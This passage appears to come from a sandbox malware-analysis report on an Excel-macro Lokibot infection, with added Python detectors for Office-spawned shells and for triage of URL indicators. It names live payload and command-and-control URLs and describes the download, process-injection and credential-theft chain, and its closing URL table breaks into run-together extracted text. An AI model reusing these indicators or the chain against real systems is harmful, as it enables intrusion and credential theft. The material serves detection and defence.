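Keying on the number of distinct families rather than on any single path keeps the rule quiet for firefox.exe reading its own key3.db while still firing on a process that has no business near any of these stores. In production telemetry the same logic applies to Sysmon event ID 11/12/13 or an EDR's file and registry access streams; only EVENT_RE changes.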

                Mitre Att&ck Matrix

                The original report renders this as a 14-column matrix (one column per tactic). It is listed here column by column, top to bottom; bracketed digits are the signature-count badges the report attaches to the techniques it observed, kept as extracted. Techniques without a badge are the matrix's default rows and were not observed.

                Initial Access: Valid Accounts [1]; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
                Execution: Scripting [31]; Exploitation for Client Execution [13]; Command and Scripting Interpreter [11]; PowerShell [2]; Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell
                Persistence: Valid Accounts [1]; Registry Run Keys / Startup Folder [1]; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron
                Privilege Escalation: Valid Accounts [1]; Access Token Manipulation [11]; Process Injection [311]; Registry Run Keys / Startup Folder [1]; Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron
                Defense Evasion: Disable or Modify Tools [11]; Deobfuscate/Decode Files or Information [111]; Scripting [31]; Obfuscated Files or Information [3]; Masquerading [111]; Valid Accounts [1]; Modify Registry [1]; Virtualization/Sandbox Evasion [2]; Access Token Manipulation [11]; Process Injection [311]; Hidden Files and Directories [1]
                Credential Access: OS Credential Dumping [2]; Credentials in Registry [2]; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
                Discovery: Account Discovery [1]; File and Directory Discovery [3]; System Information Discovery [13]; Query Registry [1]; Security Software Discovery [11]; Virtualization/Sandbox Evasion [2]; Process Discovery [1]; System Owner/User Discovery [1]; Remote System Discovery [1]; Process Discovery; Permission Groups Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools; Taint Shared Content; Replication Through Removable Media
                Collection: Archive Collected Data [11]; Man in the Browser [1]; Data from Local System [2]; Email Collection [1]; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol; Exfiltration Over Physical Medium
                Command and Control: Ingress Tool Transfer [2]; Encrypted Channel [12]; Non-Application Layer Protocol [3]; Application Layer Protocol [14]; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
                Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
                Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
                Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact; Service Stop

                Behavior Graph

                Behavior Graph ID: 336301 | Sample: 6Cprm97UTl | Startdate: 05/01/2021 | Architecture: WINDOWS | Score: 100

                The graph is an image in the original report; its nodes and edges are written out here as a process tree. Numbers in parentheses after a process name are the graph's created-registry-value / created-file counts, kept as extracted.

                Sample-level signatures:
                - Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                - Malicious sample detected (through community Yara rule)
                - Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                - 9 other signatures

                Process tree:
                EXCEL.EXE (83 / 29)
                  signatures: Obfuscated command line found; Document exploit detected (process start blacklist hit)
                  - cmd.exe
                      signature: Obfuscated command line found
                      - powershell.exe (7)
                          - 12.exe (5)
                              dropped: C:\Users\user\ntrwe.exe (PE32)
                              signatures: Drops PE files to the user root directory; Hides that the sample has been downloaded from the Internet (zone.identifier)
                              - ntrwe.exe (2)
                                  signatures: Machine Learning detection for dropped file; Writes to foreign memory regions; Allocates memory in foreign processes; 2 other signatures
                                  - RegAsm.exe (54)
                                      network: 185.206.215.56, ports 49168, 49169, 49170 (ON-LINE-DATA Serverlocation-Netherlands Dronten NL, Ukraine)
                                      signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file registry); Tries to steal Mail credentials (via file access); 2 other signatures
                              - cmd.exe
                                  - reg.exe (1)
                  - cmd.exe
                      - powershell.exe (16 / 9)
                          network: bighoreca.nl 83.172.144.37, port 80 from local port 49167 (NEDZONE-ASNL, Netherlands); cutt.ly 104.22.0.232, port 443 from local port 49165 (CLOUDFLARENETUS, United States)
                          dropped: C:\Users\user\Documents\12.exe (PE32)
                          signatures: Drops PE files to the document folder of the user; Powershell drops PE file
                      - RegAsm.exe
                  - cmd.exe
                      - powershell.exe (7)
                ntrwe.exe (second instance, started from the sample node)
                  dropped: C:\Users\user\AppData\Local\Temp\RegAsm.exe (PE32)
                  signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Hides that the sample has been downloaded from the Internet (zone.identifier); Injects a PE file into a foreign processes
                ntrwe.exe (2) (third instance, started from the sample node)

                Read bottom-up, the chain is: the Excel 4.0 macro runs cmd.exe, cmd.exe runs PowerShell, one PowerShell instance downloads the payload from bighoreca.nl (via the cutt.ly redirector) and writes 12.exe into the Documents folder, another runs it; 12.exe copies itself to the user root as ntrwe.exe, which drops a copy of the .NET RegAsm.exe into %TEMP% and injects the Lokibot payload into it, and that hollowed RegAsm.exe is the process that harvests credentials and talks to 185.206.215.56.
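The tree above is the standard Office-macro delivery chain, and it is also what the "Sigma detected: Microsoft Office Product Spawning Windows Shell" hit is keyed on. The script below is an added example for this write-up, not Joe Sandbox code and not part of the report; it walks a list of process-creation records, applies that Sigma idea widened from parent to ancestor (so the nested cmd.exe -> powershell.exe is caught too), and adds a second rule for executables run from user-writable paths under an Office ancestor, which is how 12.exe, ntrwe.exe and the dropped RegAsm.exe appear here. The records are constructed to mirror the report's tree; the PIDs and the field layout are invented, and the path prefixes treated as user-writable are an assumption.

```python
"""Walk a process tree and flag Office-originated command shells and payloads
executed from user-writable paths, the chain the behavior graph above shows
(EXCEL.EXE -> cmd.exe -> powershell.exe -> 12.exe -> ntrwe.exe -> RegAsm.exe).

Added example for this write-up, not part of the Joe Sandbox report. The
process records are constructed (PIDs are invented); the field layout
imitates Sysmon event ID 1 but this is not a Sysmon parser.
"""

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\")  # assumed


def basename(image):
    return image.rsplit("\\", 1)[-1].lower()


def ancestry(index, pid):
    """Return [self, parent, grandparent, ...] as lowercase image basenames,
    stopping at the root or at a PID cycle (PIDs get reused in real logs)."""
    chain, seen = [], set()
    while pid in index and pid not in seen:
        seen.add(pid)
        chain.append(basename(index[pid]["image"]))
        pid = index[pid]["ppid"]
    return chain


def detect(events):
    """Apply two rules to every process record and return the alerts:
    office_shell   - a shell with any Office application among its ancestors
                     (Sigma: Microsoft Office Product Spawning Windows Shell,
                     widened from parent to ancestor so nested cmd/powershell
                     is caught too)
    office_payload - a non-shell executable under a user-writable path with
                     an Office ancestor, i.e. a dropped payload being run
    """
    index = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        chain = ancestry(index, e["pid"])
        if not any(a in OFFICE_APPS for a in chain[1:]):
            continue
        image = e["image"].lower()
        if chain[0] in SHELLS:
            alerts.append(("office_shell", e["pid"], " <- ".join(chain)))
        elif image.startswith(USER_WRITABLE_PREFIXES):
            alerts.append(("office_payload", e["pid"], " <- ".join(chain)))
    return alerts


# Constructed records mirroring the report's process tree; PIDs are invented.
SAMPLE_PROCESSES = [
    {"pid": 400, "ppid": 1, "image": r"C:\Windows\explorer.exe"},
    {"pid": 1000, "ppid": 400, "image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"},
    {"pid": 1100, "ppid": 1000, "image": r"C:\Windows\System32\cmd.exe"},
    {"pid": 1200, "ppid": 1100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"pid": 1300, "ppid": 1200, "image": r"C:\Users\user\Documents\12.exe"},
    {"pid": 1400, "ppid": 1300, "image": r"C:\Users\user\ntrwe.exe"},
    {"pid": 1500, "ppid": 1400, "image": r"C:\Users\user\AppData\Local\Temp\RegAsm.exe"},
    {"pid": 1600, "ppid": 1300, "image": r"C:\Windows\System32\cmd.exe"},
    {"pid": 1700, "ppid": 1600, "image": r"C:\Windows\System32\reg.exe"},
    # Benign: a shell and a user-path binary started from Explorer, no Office ancestor.
    {"pid": 2000, "ppid": 400, "image": r"C:\Windows\System32\cmd.exe"},
    {"pid": 2100, "ppid": 400, "image": r"C:\Users\user\AppData\Local\Programs\editor\editor.exe"},
]

if __name__ == "__main__":
    for rule, pid, chain in detect(SAMPLE_PROCESSES):
        print(f"{rule:15} pid={pid:<5} {chain}")
```

Walking the full ancestry rather than checking only the immediate parent is what makes the later stages visible: RegAsm.exe is five hops below EXCEL.EXE, and a parent-only rule sees nothing unusual about ntrwe.exe starting a signed Microsoft binary. The cost is that a long-lived process started by Office (say, a browser opened from a hyperlink) stays "Office-originated" for its lifetime, so in production the payload rule is usually bounded by a time window after the Office process start.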

                Screenshots

                The screenshot thumbnails are images in the original report and are not reproduced here.

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                No Antivirus matches

                Dropped Files

                Source | Detection | Scanner | Label
                C:\Users\user\Documents\12.exe | 100% | Joe Sandbox ML | 
                C:\Users\user\ntrwe.exe | 100% | Joe Sandbox ML | 
                C:\Users\user\AppData\Local\Temp\RegAsm.exe | 0% | Metadefender | 
                C:\Users\user\AppData\Local\Temp\RegAsm.exe | 0% | ReversingLabs | 

                Unpacked PE Files

                Source | Detection | Scanner | Label
                17.2.RegAsm.exe.400000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                19.2.RegAsm.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

                Domains

                No Antivirus matches

                URLs

                Source | Detection | Scanner | Label
                (The report lists most URLs three times, once per URL Reputation engine; those rows are collapsed here and marked "x3". Trailing characters such as "0", "0E", "0$" or "03" after a URL are not part of the URL: they are the bytes that follow the string in the DER-encoded certificate data the URL was carved from, and are kept exactly as reported.)
                http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0 | 0% | URL Reputation (x3) | safe
                http://www.a-cert.at0E | 0% | URL Reputation (x3) | safe
                http://www.certplus.com/CRL/class3.crl0 | 0% | URL Reputation (x3) | safe
                http://www.e-me.lv/repository0 | 0% | URL Reputation (x3) | safe
                http://www.acabogacia.org/doc0 | 0% | URL Reputation (x3) | safe
                http://crl.chambersign.org/chambersroot.crl0 | 0% | URL Reputation (x3) | safe
                http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0 | 0% | URL Reputation (x3) | safe
                http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0 | 0% | URL Reputation (x3) | safe
                http://www.certifikat.dk/repository0 | 0% | Avira URL Cloud | safe
                http://www.chambersign.org1 | 0% | URL Reputation (x3) | safe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation (x3) | safe
                http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation (x3) | safe
                http://www.pkioverheid.nl/policies/root-policy0 | 0% | URL Reputation (x3) | safe
                http://crl.ssc.lt/root-c/cacrl.crl0 | 0% | URL Reputation (x3) | safe
                https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0 | 0% | URL Reputation (x3) | safe
                http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl | 0% | URL Reputation (x3) | safe
                http://ca.disig.sk/ca/crl/ca_disig.crl0 | 0% | URL Reputation (x3) | safe
                http://www.certplus.com/CRL/class3P.crl0 | 0% | URL Reputation (x3) | safe
                http://repository.infonotary.com/cps/qcps.html0$ | 0% | URL Reputation (x3) | safe
                http://www.post.trust.ie/reposit/cps.html0 | 0% | URL Reputation (x3) | safe
                http://www.certplus.com/CRL/class2.crl0 | 0% | URL Reputation (x3) | safe
                http://www.disig.sk/ca/crl/ca_disig.crl0 | 0% | URL Reputation (x3) | safe
                http://ocsp.infonotary.com/responder.cgi0V | 0% | URL Reputation (x3) | safe
                http://www.sk.ee/cps/0 | 0% | URL Reputation (x3) | safe
                http://www.globaltrust.info0= | 0% | Avira URL Cloud | safe
                https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E | 0% | URL Reputation (x3) | safe
                http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe
                http://www.ssc.lt/cps03 | 0% | URL Reputation (x3) | safe
                http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0= | 0% | URL Reputation (x3) | safe
                http://ocsp.pki.gva.es0 | 0% | URL Reputation (x3) | safe
                http://crl.oces.certifikat.dk/oces.crl0 | 0% | Avira URL Cloud | safe
                http://crl.ssc.lt/root-b/cacrl.crl0 | 0% | URL Reputation (x3) | safe
                http://www.dnie.es/dpc0 | 0% | URL Reputation (x3) | safe
                http://www.rootca.or.kr/rca/cps.html0 | 0% | URL Reputation (x3) | safe
                http://bighoreca.nl/wp-content/themes/index/QPR-3067.exe | 0% | Avira URL Cloud | safe
                http://www.trustcenter.de/guidelines0 | 0% | URL Reputation (x3) | safe
                http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0 | 0% | Avira URL Cloud | safe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe

                Domains and IPs

                Contacted Domains

                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                cutt.ly | 104.22.0.232 | true | true | (none) | unknown
                bighoreca.nl | 83.172.144.37 | true | true | (none) | unknown

                Contacted URLs

                Name | Malicious | Antivirus Detection | Reputation
                http://bighoreca.nl/wp-content/themes/index/QPR-3067.exe | true | Avira URL Cloud: safe | unknown
                http://185.206.215.56/morx/1/cgi.php | true | Avira URL Cloud: safe | unknown

                Both URLs are marked malicious on the strength of the observed behaviour (the first is the download the powershell.exe instance fetched from bighoreca.nl before dropping 12.exe; the second is on the host the hollowed RegAsm.exe contacted). The "safe" verdicts are URL-reputation lookups, not a judgement about what the sample did with them; fresh infrastructure routinely scores clean in reputation feeds.
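The two contacted URLs above are the indicators worth acting on, while the long list of CRL, OCSP and CPS URLs that follows is certificate plumbing present in the memory of any Windows process that has touched the certificate store. The script below is an added example for this write-up, not Joe Sandbox code and not part of the report; it shows one way to triage such a URL dump: promote strings whose host matches the sample's observed network activity, demote certificate-infrastructure URLs, and leave the remainder for manual review. ROWS is a constructed subset of the report's URL tables, CONTACTED is taken from the report's contacted domains and behavior graph, and the trailing-byte cleanup and the PKI keyword list are heuristics of this example.

```python
"""Triage URL strings recovered from process memory: promote the ones that
match the sample's observed network activity, demote certificate plumbing
(CRL/OCSP/CPS URLs that sit in every Windows process), keep the rest for
manual review.

Added example for this write-up, not Joe Sandbox code. ROWS is a constructed
subset of the report's URL tables; CONTACTED comes from its "Contacted
Domains" and behavior-graph entries. The trailing-byte cleanup and the PKI
keyword list are heuristics of this example.
"""
import ipaddress
import re
from urllib.parse import urlsplit

# Hosts and IPs the sandbox saw the sample talk to (from the report).
CONTACTED = {"bighoreca.nl", "83.172.144.37", "cutt.ly", "104.22.0.232", "185.206.215.56"}

# Substrings that mark certificate-infrastructure URLs (matched case-insensitively).
PKI_HINTS = ("crl", "ocsp", "/cps", "cps.", "/dpc", "repositor", "/polic",
             "/guidelines", ".crt", "certif", "pki", "rootca", "trust",
             "disig", "chambersign", "comsign", "a-cert", "e-me.lv", "sk.ee",
             "acabogacia", "icpbrasil", "dnie.es", "certplus", "diginotar",
             "certicamara", "swisssign")

# A URL carved out of a DER-encoded certificate is followed by the next tag
# byte (0x30 = "0") and sometimes one more: ".crl0", ".html0$", "/cps/0".
CLEAN_ENDINGS = (".crl", ".crt", ".pdf", ".html", ".cgi", "/")
DER_TAIL_RE = re.compile(r"0[^a-z0-9]?$")


def normalize(url: str) -> str:
    """Strip a trailing DER tag byte only when what remains ends in a known
    extension or a slash; otherwise leave the string untouched."""
    m = DER_TAIL_RE.search(url)
    if m and url[:m.start()].endswith(CLEAN_ENDINGS):
        return url[:m.start()]
    return url


def is_ip(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def triage(rows):
    """rows: iterable of (url, source_process). Returns {category: [(url, source)]}
    with categories contacted_payload, contacted_c2, pki_noise, review."""
    out = {"contacted_payload": [], "contacted_c2": [], "pki_noise": [], "review": []}
    seen = set()
    for raw, source in rows:
        url = normalize(raw)
        if url in seen:
            continue  # the report repeats a URL once per reputation engine
        seen.add(url)
        host = (urlsplit(url).hostname or "").lower()
        low = url.lower()
        if host in CONTACTED or is_ip(host):
            # Observed network activity: an .exe is the delivered tool, anything
            # else on such a host is a candidate command-and-control endpoint.
            cat = "contacted_payload" if low.endswith(".exe") else "contacted_c2"
        elif any(h in low for h in PKI_HINTS):
            cat = "pki_noise"
        else:
            cat = "review"
        out[cat].append((url, source))
    return out


# Constructed subset of the report's URL rows: (url as extracted, source process).
ROWS = [
    ("http://bighoreca.nl/wp-content/themes/index/QPR-3067.exe", "powershell.exe"),
    ("http://185.206.215.56/morx/1/cgi.php", "RegAsm.exe"),
    ("http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0", "powershell.exe"),
    ("http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0", "powershell.exe"),
    ("http://ocsp.infonotary.com/responder.cgi0V", "powershell.exe"),
    ("http://www.sk.ee/cps/0", "powershell.exe"),
    ("http://www.a-cert.at0E", "powershell.exe"),
    ("http://certificates.starfieldtech.com/repository/1604", "powershell.exe"),
    ("http://servername/isapibackend.dll", "powershell.exe"),
    ("http://www.windows.com/pctv.", "12.exe"),
]

if __name__ == "__main__":
    for cat, items in triage(ROWS).items():
        for url, source in items:
            print(f"{cat:18} {url}  ({source})")
```

The order of the checks matters: a contacted host is promoted before any keyword test runs, so a C2 server that happens to sit on a path containing "crl" is never demoted to noise. normalize() is deliberately conservative; "http://www.a-cert.at0E" is left as is because ".at" is not in the known-ending list, and the keyword match still classifies it correctly.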

                    URLs from Memory and Binaries

                Name | Source | Malicious | Antivirus Detection | Reputation
                (Triplicated "URL Reputation: safe" verdicts are collapsed to "(x3)". Trailing characters after a URL are bytes carved along with the string from certificate data in memory and are kept as reported.)
                http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0 | powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
                http://www.a-cert.at0E | powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
                http://www.certplus.com/CRL/class3.crl0 | powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
                http://www.e-me.lv/repository0 | powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
                http://www.acabogacia.org/doc0 | powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp | false | URL Reputation: safe (x3) | unknown
                http://crl.chambersign.org/chambersroot.crl0 | powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp | false | URL Reputation: safe (x3) | unknown
                http://cacerts.rapidssl.com/RapidSSLTLSRSACAG1.crt0 | powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmp | false | (none) | high
                http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0 | powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
                http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0 | powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp | false | URL Reputation: safe (x3) | unknown
                http://www.certifikat.dk/repository0 | powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                http://www.chambersign.org1 | powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp | false | URL Reputation: safe (x3) | unknown
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
                http://www.diginotar.nl/cps/pkioverheid0 | powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
                http://www.pkioverheid.nl/policies/root-policy0 | powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
                http://repository.swisssign.com/0 | powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp | false | (none) | high
                http://crl.ssc.lt/root-c/cacrl.crl0 | powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
                https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0 | powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
                http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl | powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
                http://ca.disig.sk/ca/crl/ca_disig.crl0 | powershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
                http://www.certplus.com/CRL/class3P.crl0 | powershell.exe, 00000006.00000003.2094933870.000000001D1B9000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
                http://repository.infonotary.com/cps/qcps.html0$ | powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
                http://www.post.trust.ie/reposit/cps.html0 | powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp; powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
                http://www.certplus.com/CRL/class2.crl0 | powershell.exe, 00000006.00000003.2094933870.000000001D1B9000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
                http://www.disig.sk/ca/crl/ca_disig.crl0 | powershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
                http://ocsp.infonotary.com/responder.cgi0V | powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
                http://www.sk.ee/cps/0 | powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
                http://www.globaltrust.info0= | powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
                https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E | powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
                http://servername/isapibackend.dll | powershell.exe, 00000006.00000002.2107223409.000000001D360000.00000002.00000001.sdmp | false | Avira URL Cloud: safe | low
                http://www.ssc.lt/cps03 | powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
                http://www.windows.com/pctv. | 12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmp | false | (none) | high
                http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0= | powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp | false | URL Reputation: safe (x3) | unknown
                http://ocsp.pki.gva.es0 | powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
                http://crl.oces.certifikat.dk/oces.crl0 | powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                http://crl.ssc.lt/root-b/cacrl.crl0 | powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
                http://www.certicamara.com/dpc/0Z | powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp | false | (none) | high
                http://crl.pki.wellsfargo.com/wsprca.crl0 | powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp | false | (none) | high
                http://www.dnie.es/dpc0 | powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
                http://www.rootca.or.kr/rca/cps.html0 | powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
                http://www.trustcenter.de/guidelines0 | powershell.exe, 00000006.00000003.2094858856.000000001D2AE000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
                http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0 | powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true | powershell.exe, 00000006.00000002.2104088848.000000001CF67000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
                http://www.globaltrust.info0 | powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
                http://certificates.starfieldtech.com/repository/1604 | powershell.exe, 00000006.00000002.2105871443.000000001D196000.00000004.00000001.sdmp | false | (none) | high
                http://www.certplus.com/CRL/class3TS.crl0 | powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
                http://www.entrust.net/CRL/Client1.crl0 | powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp | false | (none) | high
                http://www.entrust.net/CRL/net1.crl0 | powershell.exe, 00000006.00000003.2094933870.000000001D1B9000.00000004.00000001.sdmp | false | (none) | high
                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | powershell.exe, 00000006.00000002.2098764453.0000000002330000.00000002.00000001.sdmp; powershell.exe, 00000008.00000002.2135210182.0000000002380000.00000002.00000001.sdmp; powershell.exe, 00000009.00000002.2149819469.0000000002360000.00000002.00000001.sdmp | false
                                      high
                                      https://www.catcert.net/verarrelpowershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.disig.sk/ca0fpowershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp, powershell.exe, 00000008.00000002.2134654234.000000000024E000.00000004.00000020.sdmpfalse
                                        high
                                        http://www.e-szigno.hu/RootCA.crlpowershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.signatur.rtr.at/current.crl0powershell.exe, 00000006.00000003.2094900131.000000001D1E4000.00000004.00000001.sdmpfalse
                                            high
                                            http://www.sk.ee/juur/crl/0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://crl.chambersign.org/chambersignroot.crl0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://crl.xrampsecurity.com/XGCA.crl0powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.quovadis.bm0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://crl.ssc.lt/root-a/cacrl.crl0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
